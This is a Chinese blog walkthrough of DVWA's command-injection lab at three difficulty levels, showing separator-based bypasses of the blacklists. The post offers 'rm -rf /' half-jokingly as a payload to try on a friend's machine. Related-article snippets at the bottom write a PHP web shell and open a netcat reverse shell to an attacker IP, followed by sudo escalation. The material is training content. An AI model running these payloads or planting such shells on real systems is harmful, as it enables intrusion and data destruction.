DVWA——命令注入

已于 2023-07-23 15:27:29 修改
阅读量160 收藏 1
点赞数 1
文章标签: 网络安全 计算机网络
于 2023-07-20 21:05:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hand2some2/article/details/131838950
版权

1. Low级别

首先按照要求输入一个IP地址

 提交看效果:

 可以看出这个结果和cmd的界面差不多,就是乱码(不用管),那我们在cmd里面尝试一些命令:

 在上图中我们可以利用&&来将多个命令结合运行,那么尝试在这个文本内容写入:

 这段命令是:先ping地址然后移动到D盘,最后查看当前盘下所有文件。

下面是效果:

 注入成功!当然也可以注入一些危险的命令(不要轻易尝试,在你的好兄弟电脑上试)

rm -rf /

2. Medium级别

接下来我们尝试输入上个级别的命令:

 可以看出这个方法行不通,我们看下源码时怎么样的:

可以看到后端对传入的数据进行了处理,定义了一个黑名单数组,如果出现‘&&’或‘;’就将他们变为空字符串,因此有两种绕过方法:

方法1:用&来连接

 可以看到绕过成功!

方法2:用&;&连接

根据上述过滤规则,它将;和&&都变为空,那么&;&过滤后就变为了&&

同样绕过成功! 

3. High级别

根据以上的教训,我们先看源码:

可以看到,本关的黑名单级别数组更高,那咱们该如何绕过呢? 

可以看到有一个黑名单字符串是"| ",它后面有一个空串,那咱们可以利用这个规则给它绕过:

 这个字符串传到后端为"127.0.0.1 || dir",过滤后变为了"127.0.0.1 | dir",后面的“| ”被过滤掉了,因此该绕过方法成功!

小人物₍˄·͈༝·͈˄*₎◞ ̑̑
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
DVWA-命令注入
qq_60848021的博客
06-26 1662
命令注入漏洞的函数:system(),exec(),passthru(),shell_exec(),''(与shell_exec()功能相同。1,分析源码使用的函数是shell_exec()2,验证3,漏洞测试| :前面命令的输出结果作为后面命令的输入;||:前面的命令执行失败以后才会执行后面的命令;&:前面的命令执行后接着执行候命的命令;&&:前面的命令执行成功以后才可以执行下面的命令。存疑:当使用;连接时,出现错误原因是DVWA的服务器是winserver2008,” ; “分号是应用在linux系统中
dvwa——sql注入
qq_45487671的博客
05-26 2644
SQL注入攻击实验 1.实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 2.实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 3.实验过程描述 1、判断是否存在SQL注入点。 id值输入1,发现正常显示 输入
DVWA通关攻略之命令注入
勿山几已
05-06 2296
简要介绍命令注入漏洞,演示手工和burp爆破挖掘命令注入漏洞/RCE
白帽工具箱:DVWA中的命令注入(Command Injection)解析与防护策略
最新发布
技术随笔
07-08 771
注入(Command Injection)是一种严重的安全漏洞,攻击者通过将恶意命令注入系统,能够执行未经授权的操作。这种攻击通常发生在应用程序直接使用用户输入构建系统命令的情况下。在DVWA(Damn Vulnerable Web Application)环境中学习命令注入,可以帮助安全研究人员了解其原理和防护策略。
2、DVWA——命令注入
qq_55202378的博客
08-29 661
DVWA 命令·注入
DVWA 之 Command Injection(命令注入
RexHa的博客
09-29 1126
DVWA命令注入三个等级通关
DVWA——命令执行漏洞学习
Lemon's blog
08-12 4001
前言:命令执行和代码执行也是web安全中常见的一种漏洞,这次就来学习一下。
DVWA靶机通关攻略第二关——命令注入
小飞飞的博客
03-07 866
DVWA靶机命令注入详细教学
DVWA学习日记——命令注入(Command Injection)
m0_46263419的博客
11-17 551
命令注入(Command Injection),是指是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。 Low级别 window和linux系统都可以用&&来执行多条命令 127.0.0.1 && net user <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and
DVWA系列(二)——使用Burpsuite进行Command Injection(命令注入
橘子女侠
04-29 3100
1. Command Injection简介 (1)命令执行概念 命令执行漏洞是指可以随意执行系统命令,属于高危漏洞之一,也属于代码执行范围内;PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一;就好比说一句话木马<?php @eval($_POST['cmd']);?> (2)分类 代码过滤不严或无过滤; 系统漏洞造成的命令执行,bash破壳漏洞,该漏洞可以构...
dvwa命令执行的代码审计
qiukui_的博客
06-16 69
php\\ 判断前端是否提交了数据\\trim() 函数移除字符串两侧的空白字符或其他预定义字符,并将过滤后的“ip”存储变量target中\\设置黑名单' => '',\\如果存在黑名单中的符号,则将其替换为空// 根据操作系统执行ping命令// Windowselse {// *nix?
DVWA-命令注入(Command Injection)
weixin_58954236的博客
08-19 486
ipconfig,net user(查看系统用户),dir(查看当前目录),find(查找包含指定字符的行),whoami(查看系统当前有效用户名)A&B(简单的拼接,AB之间无制约关系),A&&B(A执行成功才会执行B),A|B(A的输出作为B的输入),A||B(A执行失败,然后才会执行B)
DVWA-命令注入 全级别教程
weixin_44716769的博客
09-08 5826
命令注入 实验准备 在做DVWA攻防练习时发现,注入命令返回的信息竟然是乱码,猜测可能是因为DVWA是在windows下部署的原因,底层系统是中文GBK编码所致。 在输入127.0.0.1测试时,发现如下乱码 在PHPstudy的安装目录下(每个人不同,本例中)目录下,有个dvwaPage.inc.php文件,打开文件在277行修改,将UTF-8改为GBK或者GB2312即可。 重新输入命令,不再乱码 Low等级 查看源码 stristr(string,search,before_search) s
DVWA命令注入漏洞
weixin_56306210的博客
02-06 2281
DVWA命令注入漏洞
DVWA命令注入(Command Injection)
qq_54537919的博客
06-25 774
DVWA命令注入(Command Injection) 原理 low、 medium、 high
DVWA —— Command Injection 命令注入
YouTheFreedom的博客
05-21 411
命令执行漏洞是指代码未对用户可控参数做过滤,导致直接带入执行命令的代码中,对恶意构造的语句,可被用来执行任意命令。黑客可在服务器上执行任意命令,写入后门,从而入侵服务器,获取服务器的管理员权限,危害巨大。
DVWA命令注入(command injection)
giun的博客
03-08 1227
一、什么是命令注入 1、概念 通过web应用程序在服务器上拼接系统命令。简单说就是注入命令是系统命令,而注入是靠连接来完成的。 常见的windows命令: ipconfig,查看本地网络 net user,查看系统用户 dir “./ ” 查看当前目录 等等 常见的命令拼接符有&amp;&amp;, &amp; ,|, || 二、尝试low等级 输入127.0.0.1发现输出的内容就是在c...
【P4】Windows 下搭建 DVWA命令注入漏洞详解
qq_45138120的博客
06-24 4935
包括 Windows 下六步搭建 DVWA、危害巨大的漏洞 – 命令注入、解决 DVWA 乱码问题、Command Injection 命令注入解决方法、防御漏洞之防御 low、命令注入漏洞之防御 Medium、命令注入漏洞之防御 high、命令注入漏洞之防御 impossible。
dvwa命令注入提权
12-05
根据提供的引用内容,dvwa命令注入提权的思路如下: 1.尝试写入一个php文件,可以使用如下命令: ``` echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/cmd.php ``` 这个命令会在/var/www/html/目录下写入一个名为cmd.php的文件,其中的system($_GET["cmd"])可以执行GET请求中的cmd参数所对应的命令。 2.连接菜刀,使用如下命令: ``` nc -nvlp 4444 ``` 这个命令会在本地监听4444端口,等待菜刀连接。 3.在DVWA命令注入页面中,输入如下命令: ``` & cmd=nc -e /bin/bash 你的IP地址 4444 & ``` 其中,你的IP地址需要替换成你本地的IP地址。这个命令会在目标机器上执行nc命令,将shell连接回你的本地机器。 4.在菜刀中连接目标机器,即可获得一个shell,使用whoami命令查看当前用户,如果是www-data,则可以使用如下命令提权: ``` sudo -l ``` 这个命令会列出当前用户可以使用sudo命令执行的命令。 5.如果当前用户可以使用sudo执行任意命令,则可以使用如下命令提权: ``` sudo /bin/bash ``` 这个命令会以root权限打开一个新的shell。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小人物₍˄·͈༝·͈˄*₎◞ ̑̑

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值